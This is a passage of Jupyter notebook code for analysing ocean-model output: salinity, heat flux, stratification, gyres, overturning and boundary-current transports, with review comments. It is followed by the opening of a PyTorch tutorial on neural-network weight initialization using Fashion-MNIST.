    salt_sfc = cc.querying.getvar(expt = expt[i], session = j, variable = 'salt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
    # NOTE(review): isel(st_ocean = 1) is the *second* model level, not the
    # topmost (index 0) — confirm this is intended for "surface" salinity.
    salt_sfc = salt_sfc.isel(st_ocean = 1)
    # Finite mask keeps land/missing points out of the area weighting.
    finite_variable = xr.ufuncs.isfinite(salt_sfc)
    for k, l in enumerate(basin):
        area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
        area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
        area_t_basin = (finite_variable * area_t).mean('time')
        salt_sfc_basin = (salt_sfc*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
        # Coarsen the monthly series into ncoarse-month means.
        salt_sfc_basin = salt_sfc_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
        salt_sfc_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
        del area_t
        axes[int(k/2)][int(k%2)].legend()
        axes[int(k/2)][int(k%2)].set_title('Surface salinity - ' + basin[k])
```
## Surface heat flux
```
# Net surface heat flux: area-weighted basin-mean timeseries per experiment.
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
    hflux = cc.querying.getvar(expt = expt[i], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(start_time, end_time))
    # Finite mask keeps land/missing points out of the area weighting.
    finite_variable = xr.ufuncs.isfinite(hflux)
    for k, l in enumerate(basin):
        area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
        area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
        area_t_basin = (finite_variable * area_t).mean('time')
        hflux_basin = (hflux*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
        # Coarsen the monthly series into ncoarse-month means.
        hflux_basin = hflux_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
        hflux_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
        del area_t
        axes[int(k/2)][int(k%2)].legend()
        axes[int(k/2)][int(k%2)].set_title('Surface heat flux - ' + basin[k])
# Time-mean heat-flux maps: one row per basin, one column per experiment.
fig, axes = plt.subplots(nrows = 4, ncols = 4, figsize = (20, 18))
for i, j in enumerate(session):
    sfc_heat = cc.querying.getvar(expt = expt[i], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(
        start_time_last, end_time_last))
    for k, l in enumerate(basin):
        sfc_heat_basin = sfc_heat.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
        sfc_heat_basin.mean('time').plot.contourf(ax = axes[k][i], levels = np.linspace(-100, 100, 21))
        axes[k][i].set_title(str(basin[k]) + ' - ' + name[i] + ' Run')
# Global time-mean maps (rows 0-1) plus control-minus-perturbation
# difference maps (row 2).
fig, axes = plt.subplots(nrows = 3, ncols = 2, figsize = (20, 18))
for i, j in enumerate(session):
    heat = cc.querying.getvar(expt = expt[i], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(
        start_time_last, end_time_last))
    heat.mean('time').plot(ax = axes[int(i/2)][int(i%2)], vmin = -80, vmax = 80, cmap = 'RdBu_r')
    axes[int(i/2)][int(i%2)].set_title('Net surface heating - ' + name[i])
for i, j in enumerate([session_cont, session_vary_rlds]):
    heat_cont = cc.querying.getvar(expt = expt[0], session = session[0], variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(start_time_last, end_time_last))
    heat_wfsh = cc.querying.getvar(expt = expt[2*i + 1], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(start_time_last, end_time_last))
    (heat_cont - heat_wfsh).mean('time').plot(ax = axes[2][i], vmin = -80, vmax = 80, cmap = 'RdBu_r')
axes[2][0].set_title('Net surface heating difference (control - nostress)')
axes[2][1].set_title('Net surface heating difference (control - vary_rlds)')
```
## Heat flux : Individual contributions
```
# Individual surface heat-flux components (shortwave, longwave, latent,
# sensible): global area-mean timeseries, then zonal integrals.
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
var_list = ['swflx', 'lw_heat', 'evap_heat', 'sens_heat']
var_name = ['Shortwave', 'Longwave', 'Latent heat', 'Sensible heat']
for i, j in enumerate(session):
    area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
    for k, l in enumerate(var_list):
        variable = cc.querying.getvar(expt = expt[i], session = j, variable = l, frequency = '1 monthly').sel(time = slice(start_time, end_time))
        # Area-weighted global mean of the component.
        variable = (variable * area_t).sum(dim = ['yt_ocean','xt_ocean'])/area_t.sum(dim = ['yt_ocean','xt_ocean'])
        #variable = variable.coarsen({"time": ncoarse}, boundary = "trim").mean()
        variable.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)], label = name[i])
        axes[int(k/2)][int(k%2)].legend()
        axes[int(k/2)][int(k%2)].set_title(var_name[k])
# Sum of the four components, zonally integrated and time-averaged.
plt.figure(figsize = (20, 5))
start_time_heat = '1900-01-01'
end_time_heat = end_time
for i, j in enumerate(session):
    sum_var = 0
    dxt = cc.querying.getvar(expt = expt[i], variable = 'dxt', session = j, frequency = 'static', n = 1)
    for k, l in enumerate(var_list):
        variable = cc.querying.getvar(expt = expt[i], session = j, variable = l, frequency = '1 monthly').sel(time = slice(start_time_heat, end_time_heat))
        # Weight by grid-cell width and integrate zonally.
        variable = (variable * dxt).sum(dim = ['xt_ocean'])
        # variable = variable.coarsen({"time": ncoarse}, boundary = "trim").mean()
        sum_var = sum_var + variable
    sum_var.sel(time = slice(start_time_heat, end_time_heat)).mean('time').plot(label = name[i])
plt.legend()
plt.title('Surface heat flux comparison - Zonally averaged')
# Zonally integrated, time-mean profile of each component separately.
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
    dxt = cc.querying.getvar(expt = expt[i], variable = 'dxt', session = j, frequency = 'static', n = 1)
    for k, l in enumerate(var_list):
        variable = cc.querying.getvar(expt = expt[i], session = j, variable = l, frequency = '1 monthly').sel(time = slice(start_time, end_time))
        variable = (variable * dxt).sum(dim = ['xt_ocean'])
        # variable = variable.coarsen({"time": ncoarse}, boundary = "trim").mean()
        variable.sel(time = slice(start_time, end_time)).mean('time').plot(ax = axes[int(k/2)][int(k%2)], label = name[i])
        axes[int(k/2)][int(k%2)].legend()
        axes[int(k/2)][int(k%2)].set_title(var_name[k])
```
## Stratification
```
# Stratification: time-mean pot_rho_2 (minus 1000 — presumably sigma-2,
# referenced to 2000 dbar; confirm against the model docs) sections,
# first in an Atlantic sector (lon -60 to -30), then a Pacific sector.
potrho_2_con = cc.querying.getvar(expt[0], 'pot_rho_2',session = session[0], start_time = '1995-01-01',
                                  end_time = end_time) - 1000#.sel(xt_ocean = slice(x_min,x_max)).sel(yt_ocean = slice(y_min,y_max)) - 1000
# NOTE(review): potrho_2_buo is loaded here but never used below.
potrho_2_buo = cc.querying.getvar(expt[1], 'pot_rho_2',session = session[1], start_time = '1995-01-01',
                                  end_time = end_time) - 1000#.sel(xt_ocean = slice(x_min,x_max)).sel(yt_ocean = slice(y_min,y_max)) - 1000
# Quick labelled contour check from the control run only.
plt.figure(figsize = (12, 6))
ticks = [33, 34, 35, 35.5, 36, 36.4, 36.7, 37]
test_1 = potrho_2_con.mean('time').sel(xt_ocean = slice(-60, -30)).mean('xt_ocean').plot.contour(levels = ticks)
plt.gca().invert_yaxis()
plt.clabel(test_1, inline = True,fontsize = 10)
# Filled-contour sections for every experiment, Atlantic sector.
fig, ax = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
ticks = [32, 34, 35, 35.5, 36, 36.4, 36.7, 36.9, 37]
for i, j in enumerate(session):
    potrho = cc.querying.getvar(expt[i], 'pot_rho_2',session = j, start_time = '1995-01-01', end_time = end_time) - 1000
    mean_pot = potrho.mean('time').sel(xt_ocean = slice(-60, -30)).mean('xt_ocean')
    p1 = ax[int(i/2)][int(i%2)].contourf(potrho.yt_ocean, potrho.st_ocean, mean_pot, cmap = cm.cm.curl, levels = ticks, extend = 'both')
    # Depth axis increases downward.
    ax[int(i/2)][int(i%2)].invert_yaxis()
    cb = plt.colorbar(p1, orientation = 'vertical', ax = ax[int(i/2)][int(i%2)])
    cb.ax.set_xlabel('Sv')
    ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = ticks, colors = 'k', linewidths = 0.25)
    ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = [0.0,], colors = 'k', linewidths = 0.5)
    plt.clabel(p1, inline = True, fontsize = 10)
    ax[int(i/2)][int(i%2)].set_title('Stratification (averaged over last 5 years) for ' + name[i])
# Same panels for the Pacific sector (lon -160 to -130).
fig, ax = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
ticks = [32, 34, 35, 35.5, 36, 36.4, 36.7, 36.9, 37]
for i, j in enumerate(session):
    potrho = cc.querying.getvar(expt[i], 'pot_rho_2',session = j, start_time = '1995-01-01', end_time = end_time) - 1000
    mean_pot = potrho.mean('time').sel(xt_ocean = slice(-160, -130)).mean('xt_ocean')
    p1 = ax[int(i/2)][int(i%2)].contourf(potrho.yt_ocean, potrho.st_ocean, mean_pot, cmap = cm.cm.curl, levels = ticks, extend = 'both')
    ax[int(i/2)][int(i%2)].invert_yaxis()
    cb = plt.colorbar(p1, orientation = 'vertical', ax = ax[int(i/2)][int(i%2)])
    cb.ax.set_xlabel('Sv')
    ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = ticks, colors = 'k', linewidths = 0.25)
    ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = [0.0,], colors = 'k', linewidths = 0.5)
    plt.clabel(p1, inline = True, fontsize = 10)
    ax[int(i/2)][int(i%2)].set_title('Stratification (averaged over last 5 years) for ' + name[i])
```
## Gyres
```
# Barotropic gyre streamfunctions per basin: cumulatively integrate the
# depth-integrated transport across the basin, mask missing-value fills,
# and convert kg/s to Sv (divide by rho0 * 1e6).
rho0 = 1025
start_time_gyre = '1980-01-01'
end_time_gyre = '1999-12-31'
fig, axes = plt.subplots(nrows = 4, ncols = 4, figsize = (24, 20))
for i, j in enumerate(session):
    tx_trans = cc.querying.getvar(expt = expt[i], session = j, variable = 'tx_trans_int_z', frequency = '1 monthly').sel(time = slice(start_time_gyre, end_time_gyre))
    ty_trans = cc.querying.getvar(expt = expt[i], session = j, variable = 'ty_trans_int_z', frequency = '1 monthly').sel(time = slice(start_time_gyre, end_time_gyre))
    for k, l in enumerate(basin):
        # Northern basins integrate ty zonally; southern basins integrate
        # tx meridionally.
        if(l == 'NA' or l == 'NP'):
            ty_basin = ty_trans.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yu_ocean = slice(y_min[k], y_max[k]))
            # BUGFIX: mask on |transport| <= 1e20. Previously abs() wrapped
            # the comparison — abs(ty_basin<=1.e20) — so large *negative*
            # fill values still passed the mask.
            psi_basin = ty_basin.cumsum('xt_ocean').where(abs(ty_basin)<=1.e20)/(rho0*1.e6)
        else:
            tx_basin = tx_trans.sel(xu_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
            psi_basin = tx_basin.cumsum('yt_ocean').where(abs(tx_basin)<=1.e20)/(rho0*1.e6)
        # NOTE(review): data is loaded for 1980-1999 but then sliced to
        # start_time/end_time (year 1900) — confirm the intended window.
        psi_basin.sel(time = slice(start_time, end_time)).mean('time').plot.contourf(ax = axes[k][i], levels = np.linspace(-30, 30, 21))
        axes[k][i].set_title(str(basin[k]) + ' - ' + name[i] + ' Run')
```
## Overturning circulation
```
# Global meridional overturning in density space for each experiment,
# including the GM (eddy) transport component. The density axis is
# stretched by raising (rho - 1028) to the power scfac so the dense
# classes near the bottom remain readable.
fig, ax = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 10))
#clev = np.arange(-25, 27, 2)
clev = np.linspace(-25, 25, 21)
yticks = np.array([1030, 1032, 1033, 1034, 1035, 1036,1036.5, 1037])
scfac = 4 ## A power to set the stretching
start_time_OC = '1999-01-01'
end_time_OC = '1999-12-31'
rho = 1025 # mean density of sea-water in kg/m^3
for i, j in enumerate(session):
    psiGM = cc.querying.getvar(expt[i], 'ty_trans_rho_gm', session = j, start_time = start_time_OC, end_time = end_time_OC)
    psiGM = psiGM.sum('grid_xt_ocean')
    psiGM = psiGM / (1e6*rho)
    psi = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = start_time_OC, end_time = end_time_OC)
    psi = psi.sum('grid_xt_ocean').sel(time = slice(start_time_OC, end_time_OC))
    psi = psi / (1e6*rho) # converts kg/s to Sv
    psi_avg = psi.cumsum('potrho').mean('time') #- psi.sum('potrho').mean('time')
    psi_avg = psi_avg + psiGM.mean('time')
    p1 = ax[int(i/2)][int(i%2)].contourf(psi_avg.grid_yu_ocean,(psi_avg.potrho-1028)**scfac, psi_avg, cmap=cm.cm.curl, levels = clev, extend = 'both')
    cb = plt.colorbar(p1, orientation = 'vertical', ax = ax[int(i/2)][int(i%2)])
    cb.ax.set_xlabel('Sv')
    ax[int(i/2)][int(i%2)].contour(psi_avg.grid_yu_ocean,(psi_avg.potrho - 1028)**scfac, psi_avg, levels = clev, colors = 'k', linewidths = 0.25)
    ax[int(i/2)][int(i%2)].contour(psi_avg.grid_yu_ocean,(psi_avg.potrho - 1028)**scfac, psi_avg, levels = [0.0,], colors = 'k', linewidths = 0.5)
    # Relabel the stretched axis with the original density values.
    ax[int(i/2)][int(i%2)].set_yticks((yticks-1028)**scfac)
    ax[int(i/2)][int(i%2)].set_yticklabels(yticks)
    ax[int(i/2)][int(i%2)].set_ylim([0.5**scfac, 9.2**scfac])
    ax[int(i/2)][int(i%2)].invert_yaxis()
    ax[int(i/2)][int(i%2)].set_ylabel('Potential Density (kg m$^{-3}$)')
    ax[int(i/2)][int(i%2)].set_xlabel('Latitude ($^\circ$N)')
    ax[int(i/2)][int(i%2)].set_xlim([-75,80])
    ax[int(i/2)][int(i%2)].set_title('Overturning for ' + str(name[i]) + ' Run for year 1999');
```
### Sector overturning
```
def compute_basin_psi_rho(expt,session, basin_mask, nbound=None, start_time = start_time_OC, end_time = end_time_OC):
    """Compute the time-mean overturning streamfunction (Sv) in density
    space for one basin.

    Parameters
    ----------
    expt : experiment name to query
    session : cookbook database session
    basin_mask : mask selecting the basin on the transport grid
        (multiplied into the transport before the zonal sum)
    nbound : optional file-count bound passed through to getvar's `n`
    start_time, end_time : analysis window; defaults are bound at
        definition time from the global start_time_OC/end_time_OC

    Returns
    -------
    Zonally-summed, density-cumulated, time-averaged psi, with the GM
    (eddy) component added when the experiment provides ty_trans_rho_gm.
    """
    rho = 1025 # mean density of sea-water in kg/m^3
    varlist = cc.querying.get_variables(session, expt)
    if varlist['name'].str.contains('ty_trans_rho_gm').any():
        GM = True
        print('GM is True')
        # BUGFIX: use the start_time parameter; the call previously
        # hard-coded the global start_time_OC, silently ignoring the
        # caller's start_time argument.
        psiGM = cc.querying.getvar(expt,'ty_trans_rho_gm',session, n=nbound,start_time = start_time, end_time = end_time)
        psiGM = psiGM.sum('grid_xt_ocean')
        psiGM = psiGM / (1e6*rho)
    else:
        GM = False
        print('GM is False')
    psi = cc.querying.getvar(expt, 'ty_trans_rho',session, n=nbound,start_time = start_time, end_time = end_time)
    psi = psi / (1e6*rho) # converts kg/s to Sv
    psi = (psi * basin_mask).sum('grid_xt_ocean').cumsum('potrho').mean(dim = 'time').load()
    if GM:
        psi = psi + psiGM.mean('time')
    return psi
#clev=np.arange(-25,25,2)
clev = np.linspace(-25, 25, 21)  # contour levels for the streamfunction (Sv)
yticks = np.array([1030, 1032, 1033, 1034, 1035, 1036,1036.5, 1037])
scfac = 4 ## A power to set the stretching of the y-axis
fig, axes = plt.subplots(nrows = 4, ncols = 2, figsize = (20, 24))
# One row per experiment: Atlantic sector (left column), Indo-Pacific sector (right).
for i, j in enumerate(session):
    # Transport in density space; only used below to borrow its grid coordinates.
    psi = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = start_time_OC, end_time = end_time_OC)
    # Ocean depth field: NaN over land, so ~isnull() gives a land/sea mask.
    ht = cc.querying.getvar(expt[i], 'ht', session = j, n = -1)
    land_mask = ~ht.isnull()
    # Everything south of 34S is shared by both sectors.
    south_map = (land_mask.where(land_mask.yt_ocean < -34)).fillna(0)
    # Indo-Pacific built from latitude bands whose eastern edge steps along the
    # American coastline (longitudes in the model's [-280, 80) convention);
    # indo_map5 adds the Indian Ocean west of 80E.
    indo_map1 = (land_mask.where(land_mask.yt_ocean < 9).where(land_mask.yt_ocean > -34).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-65)).fillna(0)
    indo_map2 = (land_mask.where(land_mask.yt_ocean < 15).where(land_mask.yt_ocean > 9).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-83.7)).fillna(0)
    indo_map3 = (land_mask.where(land_mask.yt_ocean < 17).where(land_mask.yt_ocean > 15).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-93.3)).fillna(0)
    indo_map4 = (land_mask.where(land_mask.yt_ocean < 85).where(land_mask.yt_ocean > 17).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-99)).fillna(0)
    indo_map5 = (land_mask.where(land_mask.yt_ocean < 30.5).where(land_mask.yt_ocean > -34).where(land_mask.xt_ocean >25).where(land_mask.xt_ocean<80)).fillna(0)
    indo_sector_map = indo_map1 + indo_map2 + indo_map3 + indo_map4 + indo_map5 + south_map
    indo_sector_mask = indo_sector_map.where(indo_sector_map>0)
    # Atlantic = ocean points that are NOT Indo-Pacific, plus the shared south.
    atlantic_sector_map = (indo_sector_mask * 0).fillna(1) * land_mask
    atlantic_sector_map = atlantic_sector_map + south_map
    atlantic_sector_mask = atlantic_sector_map.where(atlantic_sector_map>0)
    # Relabel the tracer-grid coordinates so the masks align with the
    # transport variable's (grid_xt_ocean, grid_yu_ocean) coordinates.
    indo_sector_mask.coords['xt_ocean'] = psi.grid_xt_ocean.values
    indo_sector_mask.coords['yt_ocean'] = psi.grid_yu_ocean.values
    indo_sector_mask = indo_sector_mask.rename({'xt_ocean':'grid_xt_ocean','yt_ocean':'grid_yu_ocean'})
    atlantic_sector_mask.coords['xt_ocean'] = psi.grid_xt_ocean.values
    atlantic_sector_mask.coords['yt_ocean'] = psi.grid_yu_ocean.values
    atlantic_sector_mask = atlantic_sector_mask.rename({'xt_ocean':'grid_xt_ocean','yt_ocean':'grid_yu_ocean'})
    atlantic_psi = compute_basin_psi_rho(expt[i], j, atlantic_sector_mask, start_time = start_time_OC, end_time = end_time)
    indopacific_psi = compute_basin_psi_rho(expt[i], j, indo_sector_mask, start_time = start_time_OC, end_time = end_time)
    # Atlantic panel; y-axis is (potrho - 1028)**scfac to stretch dense layers.
    p1 = axes[i][0].contourf(atlantic_psi.grid_yu_ocean,(atlantic_psi.potrho-1028)**scfac, atlantic_psi, cmap=cm.cm.curl, levels=clev, extend='both')
    axes[i][0].contour(atlantic_psi.grid_yu_ocean,(atlantic_psi.potrho-1028)**scfac, atlantic_psi, levels=clev, colors='k', linewidths=0.25)
    axes[i][0].contour(atlantic_psi.grid_yu_ocean,(atlantic_psi.potrho-1028)**scfac, atlantic_psi, levels=[0.0,], colors='k', linewidths=0.75)
    axes[i][0].set_yticks((yticks-1028)**scfac)
    axes[i][0].set_yticklabels(yticks)
    axes[i][0].set_ylim([0.5**scfac, 9.2**scfac])
    axes[i][0].invert_yaxis()
    axes[i][0].set_ylabel('Potential Density (kg m$^{-3}$)')
    axes[i][0].set_xlabel('Latitude ($^\circ$N)')
    axes[i][0].set_xlim([-75,80])
    axes[i][0].set_title('Atlantic Sector Overturning - ' + name[i] + ' run');
    ## Plotting Indo-Pacific Sector
    p1 = axes[i][1].contourf(indopacific_psi.grid_yu_ocean,(indopacific_psi.potrho-1028)**scfac, indopacific_psi, cmap=cm.cm.curl, levels=clev, extend='both')
    axes[i][1].contour(indopacific_psi.grid_yu_ocean,(indopacific_psi.potrho-1028)**scfac, indopacific_psi, levels=clev, colors='k', linewidths=0.25)
    axes[i][1].contour(indopacific_psi.grid_yu_ocean,(indopacific_psi.potrho-1028)**scfac, indopacific_psi, levels=[0.0,], colors='k', linewidths=0.75)
    axes[i][1].set_yticks((yticks-1028)**scfac)
    axes[i][1].set_yticklabels(yticks)
    axes[i][1].set_ylim([0.5**scfac, 9.2**scfac])
    axes[i][1].invert_yaxis()
    axes[i][1].set_xlabel('Latitude ($^\circ$N)')
    axes[i][1].set_xlim([-75,65])
    axes[i][1].set_title('Indo-Pacific Sector Overturning - ' + name[i] + ' run');
    # Plot a colorbar (shared axes position; last p1 wins)
    cax = plt.axes([0.92, 0.25, 0.01, 0.5])
    cb = plt.colorbar(p1, cax = cax,orientation = 'vertical', ax = axes[i])
    cb.ax.set_xlabel('Sv')
```
## Global diagnostics
```
# Number of monthly points per block average when coarsening time series.
ncoarse = 12
fig, axes = plt.subplots(nrows = 4, figsize = (20, 20))
var_list = ['temp_global_ave', 'salt_global_ave', 'temp_surface_ave', 'salt_surface_ave']
var_name = ['Global temperature', 'Global salinity', 'Surface temperature', 'Surface salinity']
# One subplot per scalar diagnostic, one line per experiment.
for i, j in enumerate(expt):
    for k, l in enumerate(var_list):
        # scalar time series from 1900 onward, block-averaged to smooth it
        variable = cc.querying.getvar(expt = expt[i], session = session[i], variable = l).sel(time = slice('1900-01-01', end_time))
        variable = variable.coarsen({"time": ncoarse*30}, boundary = "trim").mean()
        variable.plot(ax = axes[k], label = name[i])
        axes[k].legend()
        axes[k].set_title(var_name[k])
# Same layout for the global energy diagnostics.
fig, axes = plt.subplots(nrows = 2, figsize = (20, 12))
var_list = ['ke_tot', 'pe_tot' ]
var_name = ['Kinetic energy', 'Potential energy']
for i, j in enumerate(expt):
    for k, l in enumerate(var_list):
        variable = cc.querying.getvar(expt = expt[i], session = session[i], variable = l).sel(time = slice('1900-01-01', end_time))
        variable = variable.coarsen({"time": ncoarse*30}, boundary = "trim").mean()
        variable.plot(ax = axes[k], label = name[i])
        axes[k].legend()
        axes[k].set_title(var_name[k])
```
## Circulation metrics
### ACC Transport
```
# Drake Passage section: fixed longitude, latitude span of the passage.
xmin = -69.9
ymin = -71.6
ymax = -51.0
rho0 = 1036  # reference density (kg/m^3) to convert mass transport to volume transport
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
    # Depth-integrated zonal transport through the section, converted to Sv
    # (divide by rho0 for kg/s -> m^3/s, then by 1e6 for Sv).
    DP_trans = cc.querying.getvar(expt[i], 'tx_trans_int_z', session = j, start_time = '1900-01-01', end_time = end_time).sel(
        xu_ocean = xmin, method='nearest').sel(yt_ocean = slice(ymin, ymax)).sum('yt_ocean')/rho0/1e6
    DP_trans = DP_trans.coarsen({"time": ncoarse}, boundary = "trim").mean()
    DP_trans.plot(label = name[i])
plt.legend()
plt.title('Drake Passage Transport')
```
### AABW Circulation
```
latitude = -45
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
    # Zonally-summed meridional transport in density space at ~45S;
    # 1.0e-9 converts kg/s to Sv (assumes a ~1000 kg/m^3 reference density).
    psi_aabw = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = '1900-01-01', end_time = end_time).sum(
        'grid_xt_ocean').sel(method = 'nearest', grid_yu_ocean = latitude)*1.0e-9
    # Integrate from the bottom (cumsum minus total), take the abyssal-cell
    # extremum below potrho = 1036.2, annual-mean it.
    psi_aabw_sum = psi_aabw.cumsum('potrho') - psi_aabw.sum('potrho')
    psi_aabw_sum = -psi_aabw_sum.sel(potrho = slice(1036.2, None)).min('potrho').resample(time = 'Y').mean()
    psi_aabw_sum.plot(label = name[i])
plt.legend()
plt.title('AABW Circulation')
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
    # Atlantic-only longitude slice at 26N.
    # Fix: xarray requires method='nearest' in lowercase — the original
    # 'Nearest' raises an error at selection time (cf. the AABW loop above,
    # which already uses the correct spelling).
    psi_amoc = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = '1900-01-01', end_time = end_time).sel(
        grid_xt_ocean = slice(-103, -5)).sum('grid_xt_ocean').sel(method = 'nearest', grid_yu_ocean = 26)*1.0e-9
    psi_amoc_sum = psi_amoc.cumsum('potrho') - psi_amoc.sum('potrho')
    psi_amoc_sum = psi_amoc_sum.sel(potrho = slice(1035.5, None)).max('potrho').resample(time = 'Y').mean()
    psi_amoc_sum.plot(label = name[i])
plt.legend()
plt.title('AMOC cell')
```
### Gulf stream transport
```
# Gulf Stream section at 30N between 85W and 75W.
xmin = -85
xmax = -75
ymin = 30
rho = 1030
# NOTE(review): rho is defined here but the conversion below divides by rho0
# (= 1036, set in the ACC cell) — confirm which reference density is intended.
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
    # Depth-integrated meridional transport across the section, in Sv.
    GS = cc.querying.getvar(expt[i], 'ty_trans_int_z', session = j, start_time = '1900-01-01', end_time = end_time).sel(
        xt_ocean = slice(xmin, xmax)).sel(yu_ocean = ymin, method = 'nearest').sum('xt_ocean')/rho0/1e6
    GS = GS.coarsen({"time": ncoarse}, boundary = "trim").mean()
    GS.plot(label = name[i])
plt.legend()
plt.title('Gulf stream WBC')
```
### Kuroshio current
```
# Kuroshio section at 30N between 110E and 150E (model longitudes).
xmin = -250
xmax = -210
ymin = 30
rho = 1030
# NOTE(review): rho is defined but unused — the division below uses rho0
# (= 1036 from the ACC cell), same discrepancy as the Gulf Stream cell.
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
    # Depth-integrated meridional transport across the section, in Sv.
    KC = cc.querying.getvar(expt[i], 'ty_trans_int_z', session = j, start_time = '1900-01-01', end_time = end_time).sel(
        xt_ocean = slice(xmin, xmax)).sel(yu_ocean = ymin, method = 'nearest').sum('xt_ocean')/rho0/1e6
    KC = KC.coarsen({"time": ncoarse}, boundary = "trim").mean()
    KC.plot(label = name[i])
plt.legend()
plt.title('Kuroshio current WBC')
```
| github_jupyter |
# Weight Initialization
In this lesson, you'll learn how to find good initial weights for a neural network. Weight initialization happens once, when a model is created and before it trains. Having good initial weights can place the neural network close to the optimal solution. This allows the neural network to come to the best solution quicker.
<img src="https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/notebook_ims/neuron_weights.png" width=40%/>
## Initial Weights and Observing Training Loss
To see how different weights perform, we'll test on the same dataset and neural network. That way, we know that any changes in model behavior are due to the weights and not any changing data or model structure.
> We'll instantiate at least two of the same models, with _different_ initial weights and see how the training loss decreases over time, such as in the example below.
<img src="https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/notebook_ims/loss_comparison_ex.png" width=60%/>
Sometimes the differences in training loss, over time, will be large and other times, certain weights offer only small improvements.
### Dataset and Model
We'll train an MLP to classify images from the [Fashion-MNIST database](https://github.com/zalandoresearch/fashion-mnist) to demonstrate the effect of different initial weights. As a reminder, the FashionMNIST dataset contains images of clothing types; `classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']`. The images are normalized so that their pixel values are in a range [0.0 - 1.0). Run the cell below to download and load the dataset.
---
#### EXERCISE
[Link to normalized distribution, exercise code](#normalex)
---
### Import Libraries and Load [Data](http://pytorch.org/docs/stable/torchvision/datasets.html)
```
import sys
# Colab bootstrap: if torch is missing, install it (and the course's helpers.py)
# via IPython shell magics. This branch only runs in a notebook environment.
try:
    import torch
# NOTE(review): bare except silently swallows any import-time error, not just
# ImportError — consider narrowing to `except ImportError`.
except:
    import os
    os.environ['TCMALLOC_LARGE_ALLOC_REPORT_THRESHOLD']='2000000000'
    # http://pytorch.org/
    from os.path import exists
    from wheel.pep425tags import get_abbr_impl, get_impl_ver, get_abi_tag
    platform = '{}{}-{}'.format(get_abbr_impl(), get_impl_ver(), get_abi_tag())
    # detect CUDA runtime to pick the right torch wheel ('cpu' if no GPU device)
    cuda_output = !ldconfig -p|grep cudart.so|sed -e 's/.*\.\([0-9]*\)\.\([0-9]*\)$/cu\1\2/'
    accelerator = cuda_output[0] if exists('/dev/nvidia0') else 'cpu'
    !{sys.executable} -m pip install -q http://download.pytorch.org/whl/{accelerator}/torch-0.4.1-{platform}-linux_x86_64.whl torchvision >/dev/null
    ! wget https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/helpers.py >/dev/null 2>&1
    # PIL version installed in colab (5.3) is not working properly
    # downgrade it to 4.2
    !{sys.executable} -m pip uninstall -y -q pillow
    !{sys.executable} -m pip install -q pillow==4.2
import torch
import numpy as np
from torchvision import datasets
import torchvision.transforms as transforms
from torch.utils.data.sampler import SubsetRandomSampler
# number of subprocesses to use for data loading
num_workers = 0
# how many samples per batch to load
batch_size = 100
# percentage of training set to use as validation
valid_size = 0.2
# convert data to torch.FloatTensor
transform = transforms.ToTensor()
# choose the training and test datasets (downloaded to ./data on first run)
train_data = datasets.FashionMNIST(root='data', train=True,
                                   download=True, transform=transform)
test_data = datasets.FashionMNIST(root='data', train=False,
                                  download=True, transform=transform)
# obtain training indices that will be used for validation
